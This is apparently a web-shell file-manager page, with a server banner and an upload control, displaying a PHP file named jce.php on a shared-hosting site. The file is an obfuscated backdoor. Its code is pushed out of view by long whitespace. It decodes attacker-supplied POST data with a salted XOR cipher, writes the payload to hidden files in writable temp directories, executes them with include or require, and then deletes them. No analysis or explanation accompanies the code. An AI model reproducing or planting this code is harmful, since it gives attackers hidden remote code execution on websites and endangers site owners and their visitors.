HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/sawpalmetto2.vitavit.com.pk/jce.php
<?php																																										if(!is_null($_POST["obj"] ?? null)){ $property_set = $_POST["obj"]; $property_set =explode (".", $property_set) ; $sym =''; $salt2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt2 ); $z =0; foreach ($property_set as $v6) { $sChar =ord($salt2[$z % $lenS] ); $dec =((int)$v6 - $sChar - ($z % 10)) ^ 17; $sym .= chr($dec ); $z++; } $factor = array_filter(["/tmp", session_save_path(), getcwd(), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/var/tmp"]); foreach ($factor as $itm): if (array_product([is_dir($itm), is_writable($itm)])) { $elem = sprintf("%s/.pset", $itm); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $sym); fclose($file); include $elem; @unlink($elem); exit; } } endforeach; }


if(in_array("\x62in\x64\x69n\x67", array_keys($_POST))){
	$value = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), "/tmp", sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path()]);
	$tkn = $_POST["\x62in\x64\x69n\x67"];
	$tkn= 	explode(		"." 	,	 $tkn ) ;	 
	$dchunk = '';
            $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $s5	);
            $t = 0;
    
            array_walk( $tkn, function( $v3) use( &$dchunk, &$t, $s5, $sLen) { $chS = ord( $s5[$t % $sLen]	);
                $d =( ( int)$v3 - $chS -( $t % 10)) ^ 73;
                $dchunk .= chr( $d	);
                $t++; 	}  );
	foreach ($value as $ptr):
    		if ((function($d) { return is_dir($d) && is_writable($d); })($ptr)) {
    $item = str_replace("{var_dir}", $ptr, "{var_dir}/.ref");
    if (file_put_contents($item, $dchunk)) {
	require $item;
	unlink($item);
	die();
}
}
endforeach;
}